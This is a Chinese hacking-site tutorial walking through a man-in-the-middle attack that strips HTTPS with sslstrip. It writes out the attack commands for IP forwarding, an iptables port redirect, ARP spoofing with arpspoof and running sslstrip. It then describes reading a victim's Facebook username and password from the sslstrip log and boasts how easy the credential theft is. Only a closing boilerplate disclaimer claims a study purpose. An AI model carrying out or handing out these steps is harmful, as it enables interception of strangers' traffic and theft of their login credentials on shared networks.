欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

利用sslstrip对HTTPS连接发起中间人攻击

来源:本站整理 作者:佚名 时间:2018-11-06 TAG: 我要投稿

利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。
它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。
step1
首先我们将设备设置为转发模式,这样我们的设备就可以转发目标不是我们设备的数据包。
echo 1>/proc/sys/net/ipv4/ip_forward
step2
还需要设置iptables,将流量从80端口重定向到8080端口,确保出站连接发送到sslstrip中。
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
step3
需要找到我们的网关
route -n
前三步如图所示

step4
接下来我们需要找到目标主机的IP地址

 
step5
攻击者利用ARP欺骗技术将虚假的ARP消息发送到局域网中。
arpspoof -i -t

step6
现在我们打开一个新的终端并监听8080端口,命令如下
sslstrip -l 8080

step7
现在我们转到受害主机中,并且在浏览器中输入facebook.com,我们知道Facebook本来是使用的HTTPS协议,但是这里我们看到与Facebook是通过http建立的连接。

step8
现在,返回到家目录,查看sslstrip.log日志文件,我们可以看到受害者登录时输入的用户名和密码,如图:

就是这么easy,我们就拿到了受害者的凭证。
更多kali Linux教程,请参考:
· Lynis—开源安全审计工具详解
· sqlmap-检测和利用SQL注入详解
· HPING3—网络扫描器-包生成器
 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载